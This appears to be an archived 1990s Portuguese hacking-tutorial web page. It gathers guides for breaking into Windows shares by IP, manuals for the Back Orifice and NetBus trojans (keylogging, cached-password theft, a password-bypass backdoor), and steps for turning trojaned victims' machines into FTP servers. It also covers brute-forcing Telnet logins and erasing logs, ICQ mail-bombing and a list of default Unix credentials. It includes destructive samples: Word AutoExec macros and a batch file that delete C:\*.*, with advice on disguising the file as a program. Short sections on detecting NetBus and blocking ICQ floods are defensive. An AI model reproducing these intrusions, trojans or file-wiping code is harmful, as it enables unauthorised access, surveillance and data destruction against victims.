Textos Hackers
Emuladores | Roms | Mp3 | Jogos | Seriais | Textos Hack | Textos Phreack | Prog. Hacker | Themes | Piadas | Webmaster | Links |
'
'
Seu drive de Diskette A:
Invasão por IP
Alegria de uns, tristeza de outros,
na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a
internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se
propositalmente, com intenções "diversas".
Utilizar-se de uma conecção PPP do Win95 num
provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da
net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a
outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de
conecção.
Conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não
disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão.
Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não
estejam instalados, instale-os através do Painel de Controle, no ícone
Redes.
Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se
estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador
simplesmente sabendo seu IP. Se bem que, para aqueles que já
sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança
do Win95. Para você poder encontrar outros computadores
compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar
os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de
computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao
Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você
encontrará a opção para ativar a resolução WINS. No caso de você não conhecer
nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como
secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços,
utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa
criar um arquivo texto simples,utilizando-se atá mesmo o Bloco de Notas
do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse
arquivoque ficarão os endereços de IP e os nomes dos computadores que você terá
acesso. Para localizar um determinado computador, você digita o seu número de IP e a
seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa
NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu
computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,
tudo numa janela DOS.Através do Explorer você poderá ver os computadores disponíveis
na rede,dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará
unidades de seu computador.
*******************************************************************************************************************************************
Manual do Back Orifice
O Back Orifice é um aplicativo
cliente/servidor que permite ao cliente monitorar, administrar e realizar outras ações
de rede e multimídia na máquina rodando o servidor. Para se comunicar com o
servidor, o cliente (modo texto ou gráfico) pode ser executado a partir de qualquer
máquina baseada em Microsoft Windows. O servidor atualmente só roda em Windows 95/98.
O pacote bo120.zip contém:
bo.txt Este documento.
plugin.txt A ajuda para programação de plugin.
boserve.exe O auto-instalador do Back Orifice (BO).
bogui.exe O cliente modo gráfico (GUI) do Back Orifice.
boclient.exe O cliente modo texto do Back Orifice.
boconfig.exe Utilitário de configuração de nome do executável, porta, senha e plugins do servidor BO.
melt.exe Descompacta arquivos compactados com o comando "freeze".
freeze.exe Compacta arquivos que
podem ser descompactados com o comando "melt".
Para instalar o servidor, é necessário apenas executá-lo. Quando o servidor é executado, ele se instala e se apaga. Uma vez instalado em uma máquina, ele iniciará sempre que a máquina iniciar. Para atualizar uma cópia do Back Orifice remotamente, faça upload da nova versão do servidor para a máquina remota, e use o comando "Process spawn" para executá- la. Quando executado, o servidor irá automaticamente se instalar no lugar da antiga versão, se apagando após a operação. Antes da instalação, vários aspectos do servidor podem ser configurados com o utilitário "boconfig": o nome do arquivo em que o Back Orifice se instalará, a porta em que o servidor pode ser acessado e a senha de acesso. Se o servidor não for configurado, ele será acessado na porta 31337, sem senha e se instalando como " .exe" (espaço ponto exe).
O cliente se comunica com o servidor através de pacotes UDP encriptados. Para que se comuniquem, o cliente deve enviar os pacotes para mesma porta que o servidor estiver recebendo, e a senha do cliente deve coincidir com a senha do servidor.
A porta na qual o cliente envia os pacotes pode ser configurada através do parâmetro -p (GUI ou modo texto). Se o acesso estiver sendo filtrado ou um "Firewall" estiver rodando, pode ser necessário enviá-los por uma porta específica, que não esteja sendo filtrada ou bloqueada.
O servidor realiza ações através do envio de comandos do cliente para um endereço IP específico. Se a máquina servidor não estiver sob um endereço estático, ela pode ser localizada utilizando-se os comandos de varredura "sweep" ou "sweeplist" do cliente modo texto, e no GUI através do comando "Ping..." ou entrando-se com um IP na forma "1.2.3.*".
Os comandos atualmente incorporados ao Back Orifice estão listados abaixo Alguns dos nomes diferem entre o GUI e o modo texto, mas a sintaxe é a mesma para a maioria dos comandos. Mais informações sobre qualquer dos comandos podem ser exibidas através do cliente modo texto digitando-se "help command". O cliente GUI usa os dois campos de parâmetro para descrever as variáveis requeridas por cada comando selecionado da lista "Command". Se parte da informação requerida pelo comando não for fornecida, o erro "Missing data" será enviado pelo servidor.
Os comandos do Back Orifice são:
(gui/comando texto)
App add/appadd -Abre e redireciona um aplicativo modo texto para uma porta tcp. Isso permite que você controle o aplicativo modo texto ou modo dos (como command.com) via telnet.
App del/appdel Desliga o redirecionamento de um aplicativo.
Apps list/applist Lista os aplicativos atualmente conectados.
Directory create/md Cria diretório.
Directory list/dir Lista arquivos e diretórios. Você deve especificar um curinga caso queira que mais de um arquivo seja listado.
Directory remove/rd Remove um diretório.
Export add/shareadd Compartilha um diretório ou drive do servidor em rede. O ícone diretório ou drive compartilhado não é alterado.
Export delete/sharedel Remove um compartilhamento.
Exports list/sharelist Lista os compartilhamentos, o drive ou diretório que está sendo compartilhado, os acessos e a senha do compartilhamento.
File copy/copy Copia um arquivo.
File delete/del Remove um arquivo.
File find/find Procura no diretório arquivos que coincidam com a especificação curinga.
File freeze/freeze Compacta um arquivo.
File melt/melt Descompacta um arquivo.
File view/view Visualiza o conteúdo de um documento texto.
HTTP Disable/httpoff Desabilita o servidor http.
HTTP Enable/httpon Habilita o servidor http.
Keylog begin/keylog Registra o texto digitado no
servidor em um arquivo texto. O log mostra o nome da janela em que o texto foi
digitado.
Keylog end Interrompe o registro de texto digitado. Para utilizar esse comando no modo texto, use o comando "keylog stop".
MM Capture avi/capavi Captura vídeo e áudio (se disponível) de um dispositivo de captura de vídeo para um arquivo avi.
MM Capture frame/capframe Captura um quadro de vídeo de um dispositivo de captura de vídeo para um arquivo bitmap.
MM Capture screen/capscreen Captura uma imagem da tela do servidor para um arquivo bitmap.
MM List capture devices/listcaps Lista os dispositivos de captura de vídeo.
MM Play sound/sound
Toca um arquivo wav no servidor.
Net connections/netlist
Lista as conexões de entrada e saída da rede.
Net delete/netdisconnect
Desconecta o servidor de uma rede.
Net use/netconnect
Conecta o servidor em uma rede.
Net view/netview
Lista todas as interfaces de rede, domínios, servidores e envios do servidor.
Ping host/ping
Testa a conexão com a máquina remota. Informa o nome da máquina e a versão do
BO.
Plugin execute/pluginexec
Executa um plugin do Back Orifice. Executar funções não entendidas pelo plugin
pode fazer com que o servidor trave.
Plugin kill/pluginkill
Desliga um plugin.
Plugins list/pluginlist
Lista plugins ativos ou avisa de que um plugin foi desligado.
Process kill/prockill
Termina um processo.
Process list/proclist
Lista processos rodando.
Process spawn/procspawn
Abre um programa. Pelo GUI, se o segundo parâmetro é especificado, o processo
será executado normalmente e visível. Caso contrário ele será executado de
maneira invisível.
Redir add/rediradd
Redireciona recebimento de conexões tcp ou pacotes udp para outro endereço ip.
Redir del/redirdel
Interrompe o redirecionamento de uma porta.
Redir list/redirlist
Lista os redirecionamentos de portas ativos.
Reg create key/regmakekey
Cria uma chave no registro.
NOTA: Para todos os comandos de registro, não especificar a \\ inicial de
valores de registro.
Reg delete key/regdelkey
Remove uma chave no registro.
Reg delete value/regdelval
Remove um valor no registro.
Reg list keys/reglistkeys
Lista as sub-chaves de uma chave de registro.
Reg list values/reglistvals
Lista os valores de uma chave de registro.
Reg set value/regsetval
Define um valor para uma chave de registro. Os valores são especificados no
formato tipo vírgula valor. Para valores binários (tipo B) o valor é um série
de dois dígitos hexadecimais. Para valores DWORD (tipo D) o valor é um número
decimal. Para valores string (tipo S) o valor é uma string de texto.
Resolve host/resolve
Determina o endereço ip de uma máquina em relação à máquina servidor. O nome da
máquina pode ser um "host name" ou o nome de uma máquina em rede local.
System dialogbox/dialog
Cria uma caixa de diálogo no servidor com o texto informado e um botão "ok".
Você pode criar quantas caixas de diálogo quiser, elas aparecerão em cascata
umas sobre as outras.
System info/info
Exibe as informações do sistema da máquina servidor. Os dados exibidos incluem
nome da máquina, usuário, tipo de cpu, memória total e disponível, dados sobre a
versão de Windows e informações sobre os drives, incluindo tipo (fixo, cd-rom,
removível ou remoto) e, nos drives fixos, o tamanho e espaço disponível do
drive.
System lockup/lockup
Trava a máquina servidor.
System passwords/passes
Exibe as senhas cacheadas e a senha do protetor de tela. As senhas podem
apresentar caracteres estranhos no fim.
System reboot/reboot
Desliga o servidor e reinicia a máquina.
TCP file receive/tcprecv
Conecta o servidor a um ip e porta específicos e grava qualquer dado recebido
por aquela conexão em um arquivo.
TCP file send/tcpsend
Conecta o servidor a um ip e porta específicos, envia o conteúdo do arquivo
especificado e o desconecta.
Arquivos podem ser transferidos _do_ servidor usando-se o comando "tcp file
send" e o utilitário netcat com os parâmetros:
netcat -l -p 666 > arquivo
Arquivos podem ser transferidos _para_ o servidor usando-se o comando "tcp file
receive" e o utilitário netcat com os parâmetros:
netcat -l -p 666 < arquivo
NOTA: A versão para Windows do netcat não desconcerta nem se finaliza quando
atinge o final da transmissão. Após o término, finalize o netcat com ctrl+c ou
ctrl+break.
BOConfig:
BOconfig.exe permite configurar as opções de um boserve.exe antes que ele seja
instalado. Ele requisitará:
Runtime executable name
O nome do arquivo que o Back Orifice se instalará no diretório system do
Windows. O nome não precisa tem a extensão exe, ela será automaticamente
adicionada.
Exe description in registry
A descrição do executável do Back Orifice no registro do Windows, de onde ele
será executado sempre que o Windows se iniciar.
Server port
A porta em que o servidor será acessado.
Encryption password
A senha de acesso ao servidor. Não é obrigatória e pode ser deixada em
branco.
Default plugin to run on startup
O plugin do Back Orifice a ser executado ao iniciar.
File to attach
Arquivo a ser anexado ao boserve.exe. Ele pode ser um plugin, que será
automaticamente iniciado com o boserve.exe.
NOTA: Se o servidor não for configurado com o BOconfig.exe, ele se comunicará na
porta 31337 sem senha, e se
instalará como " .exe"
*******************************************************************************************************************************************
Manual do Netbus
1. Introdução
Semelhante ao Back Orifice, o NetBus é uma ferramenta que pode ser utilizada como um sistema de administração remota para os ambientes
operacionais Windows 95, Windows 98 e Windows NT.
É composto por um programa que atua
como Servidor e um programa que atua como Cliente, permitindo conexões remotas mesmo
através da Internet, utilizando-se do protocolo TCP.
Por suas inúmeras características e facilidades, o NetBus passou a ser utilizado principalmente por hackers que pretendem manter controle sobre
as máquinas de suas vitimas, sem
serem notados/detectados.
2. Comprometimento
O Servidor NetBus é auto-instalável indicando que na primeirá execução
a maquina passará a ser
comprometida.
O NetBus permite um amplo controle sobre o Servidor, apresentando
inúmeras características das quais se destacam:
- Auto-instalável
- Auto executável (com o boot do Windows)
- Permite iniciar/executar qualquer aplicativo
- Permite fechar/terminar qualquer aplicativo
- Permite rebootar o servidor
- Pode desconectar usuários
- Permite enviar caracteres para aplicativos ativos
- Permite capturar o que esta sendo digitado no computador servidor
- Permite capturar a tela (screenshot) do computador servidor
- Retorna informações gerais sobre o computador
- Permite realizar upload de arquivos para o servidor
- Permite realizar download e deleções de qualquer arquivo do servidor
- Permite capturar o som de microfones instalados no servidor
- Possui esquemas de proteção e validação de acessos através de senhas
- Não aparece na Task List do
Windows
Além disso, o NetBus faz uso de senhas para permitir o controle de acessos ao Servidor NetBus. A string que contém a senha que o Cliente
envia para o Servidor é semelhante à linha abaixo:
Password;0;my_password
No entanto, detectou-se a presença
de um backdoor no NetBus que permite a qualquer Cliente estabelecer conexão com o
Servidor sem a necessidade de se utilizar uma senha. O Cliente pode conectar-se sem
autenticação bastando substituir o valor do segundo parâmetro da string de conexão
acima de "0" para "1".
3. Detecção
Por default, o Servidor NetBus
chama-se Patch.exe. No entanto pode perfeitamente ser renomeado para qualquer outro nome.
O NetBus utiliza TCP para estabelecer o envio/recebimento de pacotes e dados, permanecendo ativo nas portas 12345 e 12346 aguardando por
conexões de clientes.
Como primeiro passo, é possível verificar se essas portas estão em uso por algum serviço. Para tanto utiliza-se o comando 'netstat' conforme
exemplo abaixo:
c:\>netstat -an | find "1234"
TCP 127.0.0.1:12345 0.0.0.0:0
LISTENING
Em seguida, é possível identificar que serviço esta ativo na porta apresentada pelo netstat. Para tanto utiliza-se o comando telnet,
conforme exemplo abaixo:
c:\>telnet 127.0.0.1 12345
Se o NetBus estiver instalado e aguardando por conexões nesta porta, a
seqüência abaixo irá aparecer na
janela do telnet:
'NetBus 1.53'
Ou:
'NetBus 1.60'
Alem desse procedimento, é possível examinar o registro do Windows a procura de algumas chaves que podem ser criadas pelo programa quando de sua instalação. Execute o 'regedit' e faca uma busca pelas chaves abaixo:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[Nome do NetBus]
HKEY_CURRENT_USER\Patch\Settings\ServerPwd
A primeirá chave indica que o NetBus esta configurado para ser inicializado automaticamente a cada boot do sistema. Já a segunda chave
indica qual a senha (em formato texto
puro) que esta sendo utilizada para validar conexões.
4. Removendo o NetBus
Indica-se dois procedimentos básicos e simples para remoção do NetBus:
1) fazer uso de uma opção do Servidor NetBus que automaticamente deleta
o executável, conforme exemplo abaixo:
c:\>nome_do_netbus_server.exe /remove
2) utilizar o Cliente do NetBus para fazer essa remoção. Basta conectar-se ao Servidor (podendo ser localhost), selecionar "Server admin"
e em seguida "Remove server".
No entanto, notamos que em alguns
casos as duas opções falharam ao limpar o registro do Windows. Logo, indicamos que o
processo de remoção seja feito manualmente deletando-se o executável e limpando-se o
registro eliminando-se as chaves criadas pelo NetBus.
*******************************************************************************************************************************************
FTP
Para Hackear em FTP, Primeiro vc deve
saber o indereço do Host ou seu IP, para isto use o IPSCAN, digitando o IP Principal do
Host:
Lista de Alguns FTP's
ftp.mandic.com.br
ftp.bestway.com.br
ftp.internetclub.com.br
ftp.netscape.com
ftp.angelfire.com
Let's HaCk !!!
Va ao Prompt e digite FTP, ao aparece
o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou
seu IP, tipo (to) ftp.mandic.com.br.
Ao conectar ele pedirá a senha e o
Password, tente user os passwords UNIX, se não der vc deve entrar INVISIVEL!!
Como entrar Invisivel?
No login precione ENTER, no password precione Novamente... Ira aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , precione ENTER e digite:
quote cwd ~root
Precione ENTER novamente e digite:
quote pass ftp
Pronto, vc esta Hackeando... Mas tem
um porem..., se escrever a mensagem : user restriction aplly,
vc não esta Hackeando.., pois esta aplicada a
proteção, para isto tente com outro user tipo quote cwd ~sys e os outros da lista
UNIX....
Meu Deus...eu entrei e agora o quê eo faço?
Ao entrar vc vai estar no Diretorio do login, tipo \home\root\,
Dai, para ver a lista de users vc
volta um dir vá para o dir \home\ e cada dir é um usuario,... não tentem pegar as
senhas , pois são Cryptografadas...
Pois a maioria dos users usa a mesma senha
login....
Não responsabilizamos por atos
cometidos nos Hosts... o problema é de quem HaCkEiA, e não nosso,
pois tome muito cuidado, e NUNCA, mas
NUNCA apague NADA!!!
Invasão por FTP ( usando trojans )
1) O que é um FTP server?
Um FTP server é um servidor de
FTP, ou seja, um servidor de internet que
disponibiliza arquivos para serem acessados por
um cliente de FTP.
2) Como se acessa um servidor FTP?
Através de um cliente de FTP,
como WS_FTP ou CuteFTP. Pode-se também usar
um cliente de HTTP (navegador), como Netscape
Navigator.
3) Como transformar o IP de uma vítima em um FTP server?
Para que o IP da vítima se
torne um servidor FTP é necessário que você
abra uma porta FTP na máquina da vítima.
4) Que trojans que permitem abrir uma porta FTP?
Atualmente o Deep Throat 2.0 ou
o 1.0 e o WinCrash permitem este tipo de acesso. Os
outros trojans permitem diferentes tipos de
acesso.
5) Que comandos nesses trojans devemos usar para abrir uma porta FTP?
5.1) No Deep Throat 1.0
Para abrir um servidor FTP no
DT 1.0 basta se usar o comando "Start/Stop
FTP Server", o que irá abrir um servidor
de FTP na porta 21.
5.2) No Deep Throat 2.0
Para abrir um servidor FTP no
DT 2.0 basta se usar o comando "FTP Port", e
designar uma porta de 0001 a 9999. Em
seguida utilize o comando "FTP Server", que
irá iniciar o servidor de FTP. Se não
for designada uma porta, o servidor será
aberto na porta 41.
5.3) No WinCrash 1.03
Para abrir um servidor FTP no
WinCrash 1.3, utilize o comando "Open Server
Hard Disk" na guia "File
Manager". O servidor será aberto na porta 21.
6) Como proceder para invadir por FTP?
6.1) Por cliente de FTP
Entre em "Host" com o
IP do servidor, e em Port com a porta FTP. Com isso
você acessará os drives da vítima
normalmente.
6.2) Por cliente de HTTP
Vá ao navegador e digite:
ftp://IP:PORTA
onde
IP é o IP da vítima;
PORTA é a porta que foi aberta.
Agora você terá à sua
disposição os drives da vítima, que podem ser
explorados no navegador como um servidor FTP.
7) Quais as vantagens do FTP server sobre o HTTP server?
O FTP server permite ao
cliente, além do upload (envio) e download
(recebimento), excluir, renomear e criar
arquivos e diretórios.
*******************************************************************************************************************************************
Invasão por IP (2)
Passa-a-passo: 1º- Certifique-se de que você possui este programa nbstat:
2º- Vá ao Prompt do MS-DOS.
3º- Digite: nbtstat -a o IP do cara que você quer invadir
4º- Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o foda é que não da para invadir o computador de certos caras por causa disso então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)
5º- Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.
6º- Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do cara NetBios dele . O NetBios é aquele nome esquisite que tem o atras. (Digite exatamente daquela forma que eu digitei)
7º- Mapeie sua unidade de disco de forma que a máquina do cara se torne parte de seu PC.
8º- Vá em "Iniciar", "Executar" e digite: //IP_do_cara e ponha "OK"
9º- Pronto! Você invadiu por IP!
10º- Conselho : Nunca apague nem
modifique NADA somente fuce bastante nas coisas do lammaH e se achar algo interessante
pega para você. OBS: Tem algumas pessoas que renomeiam o arquivo vnbt.386 no
windows\sytem para que se alguem tente te nukar ou invadir não consiga... ; pois bem
você vai ter que renomear o seu arquivo senão não da para invadir.
*******************************************************************************************************************************************
Telnet
Protocolo de Terminal Virtual) é o
protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão
remota, pode-se excutar programas e comandos em outra máquina, como se o teclado de seu
computador estivesse ligado diretamente a ela. O visual de uma conexão via Telnet é
semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remoto se
dá da mesma forma, ou seja, através de uma linha de comandos Unix ou a partir deum menu
de comandos disponíveis que sempre se apresenta em algum lugar da tela (esta última
forma é amais comun em servidores que permitem acesso público). O Telnet pode ser usado
para a pesquisa de informações e transferência de arquivos - tudo depende do que
ocomputador ao qual você está conectado permitir que você faça. Ele também é muito
usado por operadores de sistemas (Sysop's) a fim de fazer algum tipo de manutenção (se
você pensa que o Sysop de seu provedor sai de casa toda vez que tem algum problema nos
servidores, está muito enganado; muitas vezes ele faz a manutenção de casa mesmo, via
Telnet !) Programas para Telnet Para fazer uma conexão via Telnet, é necessário um
programa específico. O windows 95 já vem com um (procure no diretório windows o
programa Telnet.exe - deve estar lá !). Caso seu provedor não lhe forneça um programa
para Telnet,você pode conseguir um clicando no endereço abaixo : CommNet (para
Windows3.x) - Shareware NetTerm (para Windows 95) - Freeware NCSA Telnet (para DOS)
ftp://ftp.ncsa.uiuc.edu/Telnet/DOS/tel2308b.zip Conectando-se via Telnet. Os passos que
apresentamos aqui são para o programa que acompanha o windows 95, mas servemperfeitamente
para outros programas, com algumas variações, que você pode perceber e contornar. Se
vocêtem algum dos programas listados ao lado, leia isto primeiro e depois passe para a
página específica desse programa. Inicie o programa Telnet.exe entre na HomePage de
algum servidor (Tente: www.bhnet.com.br - bem fácil) e procure pela lista de homepages
pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode
perceber um padrão do tipo http://www.servidor.com.br/~usuário, onde usuário é o login
do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite
telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa
outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via
telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto
tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no
nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de
homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você
deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica,
relacionando a senha com o login (ex: login:kurt senha:cobain). Agora vem o próximo e
mais valioso passo. Tentar pegar a senha do administrador. mas para isso vc tem que
descobrir quais são as senhas padrões para o administrador em cada sistema . Novamente
usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao
servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego.
Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair
*******************************************************************************************************************************************
Vírus macro
Ainda hoje existe muita gente que so
é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos,
milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste
riquissimo processador de texto.
Esta materia tem como objetivo fazer desde
pequenas ate grandes sacanagens com usuarios pentelhos.
PS: Software/versao Abrangido: Word da
Microsoft, versões 6 (win3.11) e 7.0 (win95)
O Word possui um arquivo chamado
"normal.dot" onde estão todas as configuracões padrao do word. Se por algum
motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.
Niveis de sacanagem
Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... Não é mais brincadeira.
Primeiro voce precisa criar uma macro... siga os passos:
Entre no Word, feche a janela de
documento, não deixe nenhum
documento aberto(ativo), clique em Arquivo(File)
depois Macro,
coloque no nome da macro
"AutoExec"(obrigatorio) esta macro é
inicializada toda vez que o Word for iniciado,
depois clique em
'Criar', delete as duas linhas que tiver la (Sub
MAIN e End Sub) e
cole a rotina que tem logo mais abaixo.
PS: existe outras formas/meios d
criar uma macro, mas esta é mais
simples.
Nivel 1
O nivel 1 serve para voce se mostrar,
falando que entende do Word
melhor do que ninguem. Cada vez que o usuario
inicia o Word recebera
uma mensagem... de alerta ou qualquer outro
coisa que sair da sua
mente. veja abaixo.
Sub MAIN
MsgBox "Voce vai morrer, estou atrás de
voce, tome cuidado por
onde anda...", "Microsoft Word",
5
MsgBox "To falando a verdade",
"FATAL ERROR", 16
MsgBox "DESGRÇADO", "Voce não
passa de 24hs", 64
End Sub
Nivel 2
É para deixar o usuario
irritadissimo. no corpo da macro cole este
texto abaixo:
Sub MAIN
ArquivoNovoPadrão
Inserir "Filho"
ArquivoNovoPadrão
Inserir "da"
ArquivoNovoPadrão
Inserir "Puta"
ArquivoNovoPadrão
Inserir "Filho da Puta "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "Filho da Puta voce vai morrer hoje
"
End Sub
Nivel 3
Bom este nivel é pura sacanagem, com
ele um simples clicar do
mouse, e tudo desaparece! isto mesmo "del
*.*" ou apenas os
documentos, voce é quem sabe.
Sub MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub
Lembre-se de que estes macros, sao
gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado,
o Word cria automaticamente na inicializacao, entao se voce for fazer estas sacanagens ai
acima, proteja este arquivo, com o comando 'attrib +r'.
*Não me responsabilizamos por qualquer ato seu*
*******************************************************************************************************************************************
Criando um Vírus
Para fazer, entre no Edit do DOS e crie um arquivo .bat e neste arquivo digite:
ECHO ECHO OFF ECHO Y | del c:\*.* cls ECHO já era otario!!! Seu c: nao existe mais!
Depois de digitar salve o arquivo e logo em seguida, você vai precisar de um compilador de arquivos de .bat para .exe porque no Edit, ele vai salvar o vírus como .bat !! Se o cara rodar o arquivo .bat, o vírus funciona do mesmo jeito mas se ele estiver em .exe você pode dar uma desculpa dizendo que é algum programa e quando o cara rodar, ele se fode !!!
Importante: Se o windows do cara for na versão em português, mude o "Y" para "S".
Descrição dos comandos:
ECHO OFF => Apaga as linhas do
comando ECHO Y | del c:\*.* => Deleta o c:\*.* cls => Limpar ECHO já era otario!!!
Seu c: nao existe mais! => Mensagem que vai aparecer quando ele rodar o arquivo...
*******************************************************************************************************************************************
Atacando o ICQ:
Usando seu mailbomber para bombear o ICQ : O icq permite que você possa mandar e-mails para outros usuários. Então vamos aproveitar disso para bombardear um outro usuário um mailbomb. O mailbomb manda diversas mensagens para o e-mail da vitima, isso é exatamente o que vamos fazer!! Enviar um monte de mensagens para o icq de um usuário. Tudo que você vai precisar é de um programa de mail bomb e o UIN ( n° do icq ) da vitima mas não é necessario que você tenha essa pessoa na sua lista. Coloque seu e-mail bomb para bombear... Isso é bem simples. "Uin da vítima@pager.mirabilis.com"
Exemplo: 123456@pager.mirabilis.com
O cara vai ser bombeado exatamente como faz um mail bomb !! Na verdade essa tecnica faz exatamente o que faz o "icq bomber" faz. Porém, talvez seja mais rápido... ( Bem melhor )
*******************************************************************************************************************************************
Proteção contra ataques do
ICQ:
Uma das coisas mais úteis na internet talvez seja o icq. O programa é quase que fundamental. Um dos problemas do programa é você estar conversando na boa e de repente você recebe milhares de mensagens !! Isso é muita pentelhação, porém existem modos de se defender dos floods. Alguns desses modos você encontrará nesse texto abaixo.
Flooding :
O primeiro programa brasileiro a floodear um usuario usando o sistema random user do icq foi o flooder. Esse programa faz um ataque de cliente a cliente, ou seja, de você ao usuário a ser bombeado. Para isso ele terá que se conectar a uma porta do seu computador. A porta padrão do ICQ é a 1027. Na maioria das vezes ela está aberta e o usuário é bombeado a partir dela.
O que iremos fazer para nos defendermos dos ataques dos flooders é travar o acesso dessas portas. Para isso iremos usar uma firewall. Firewall (parede de fogo) é um programa que impede qualquer conecção com portas selecionadas.
Arranje a firewall e instale. Agora abra a firewall e vá na seção Rule list. E clique em add. Uma nova janela se abrirá, agora você tem que selecionar as portas que você deseja colocar a firewall.
Aqui vai como deverá ficar suas opções: (as opções com "º" são pra voce selecionar)
Visualização das configurações do programa:
ºAll IP adress
|--RULE TYPE--| |----LOCAL PORT SELECTION-----|
|Allow in| |all ports| |allow out| |single port| |ºdisallow in| |ºports from "1000" to "7000"| |disallow out|
---------------------------------------------------------------
|--PROTOCOL--| |----REMOTE PORT SELECTION----|
|ºtcp/ip| |all port| |udp| |single port| ---------- |ºports from "1000" to "7000"|
---------------------------------------------------------------
Visulização das configurações do programa :
Configure um novo rule list assim e pronto! Você não receberá mais aqueles montes de mensagens pentelhas do flooder e do ickiller!
Mail bombing :
Para se defender desse problema é muito fácil! O mailbombing de icq utiliza um sistema chamado mailexpress. Quando te bombardeiam, você recebe várias mensagens de e-mail de icq, então nós iremos cancelar o recebimento desse tipo de mensagens.
Para isso abra o ICQ, vá no menu e então em security & privacity.
Uma nova janela irá se abrir. Entre na seção de ignore list e selecione a opção: "Do not accept mailexpress messages". E salve as alterações.
Pronto! Você nunca mais será
bombeado dessa maneira. Quando as pessoas irem em seu info, não aparecerá mas o seu IP.
*******************************************************************************************************************************************
Encontrando sistemas:
Encontrando o Sistema
1. Para encontrar um computador com o sistema,
você deve procurar pelas linhas com um programa chamado War Dialer, ou se conectar via
Telnet ou outro sistema de interligação de computadores. War Dialer: VMB Hacker (40,7k)
Sistemas UNIX
2. Tentar entrar com os defaults
3. Ver quem está on-line com os comandos: who,
rwho, finger; e tentar entrar com seus logins mais tarde.
Defaults são logins e passwords que já vem com
o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a
sorte de encontrar um esquecido. Veja lista abaixo.
Login: ..Password:
root ....root
root ....system
sys .....sys
sys .....system
daemon ..daemon
uucp ....uucp
tty .....tty
test ....test
unix ....unix
unix ....test
bin .....bin
adm .....adm
adm .....admin
admin ...adm
admin ...admin
sysman ..sysman
sysman ..sys
sysman ..system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who .....who
learn ...learn
uuhost ..uuhost
guest ...guest
host ....host
nuucp ...nuucp
rje .....rje
games ...games
games ...player
sysop ...sysop
root ....sysop
demo ....demo
Ex.: fou:123abc45:6789:10:Ricardo
Gomes:/home/dir/fou:/bin/fou
Username: fou
Encrypted Password: 123abc45
User Number: 6789
Group Number: 10
Other Information: Ricardo Gomes
Home Directory: /home/dir/fou
Shell: /bin/fou
